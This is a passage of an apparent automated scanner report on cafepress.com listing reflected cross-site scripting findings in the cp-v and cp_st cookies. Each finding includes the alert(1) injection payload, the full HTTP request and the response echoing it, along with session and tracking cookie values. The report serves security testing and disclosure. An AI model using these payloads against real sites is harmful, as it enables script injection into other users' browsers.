__utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 63777
Date: Sun, 26 Dec 2010 13:48:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/
Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 63777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '93d2c</script><script>alert(1)</script>063b6447c14'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.34. http://www.cafepress.com/+greeting_cards [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+greeting_cards

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61088"-alert(1)-"7f0a7ca94f0 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+greeting_cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59694
Date: Sun, 26 Dec 2010 13:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/
Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:18 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA61088"-alert(1)-"7f0a7ca94f0";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.35. http://www.cafepress.com/+greeting_cards [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+greeting_cards

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53143</script><script>alert(1)</script>28c54f936c4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+greeting_cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=53143</script><script>alert(1)</script>28c54f936c4; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 59716
Date: Sun, 26 Dec 2010 13:49:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '53143</script><script>alert(1)</script>28c54f936c4'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.36. http://www.cafepress.com/+hats-caps [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+hats-caps

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a79d4"-alert(1)-"d4edfd82353 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+hats-caps HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59421
Date: Sun, 26 Dec 2010 13:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa79d4"-alert(1)-"d4edfd82353";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.37. http://www.cafepress.com/+hats-caps [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+hats-caps

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64dd9</script><script>alert(1)</script>4516792b671 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+hats-caps HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=64dd9</script><script>alert(1)</script>4516792b671; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59443
Date: Sun, 26 Dec 2010 13:47:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '64dd9</script><script>alert(1)</script>4516792b671'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.38. http://www.cafepress.com/+ipad-cases [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+ipad-cases

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4658a"-alert(1)-"85663dcf2b1 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+ipad-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 88289
Date: Sun, 26 Dec 2010 13:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/
Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 88289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
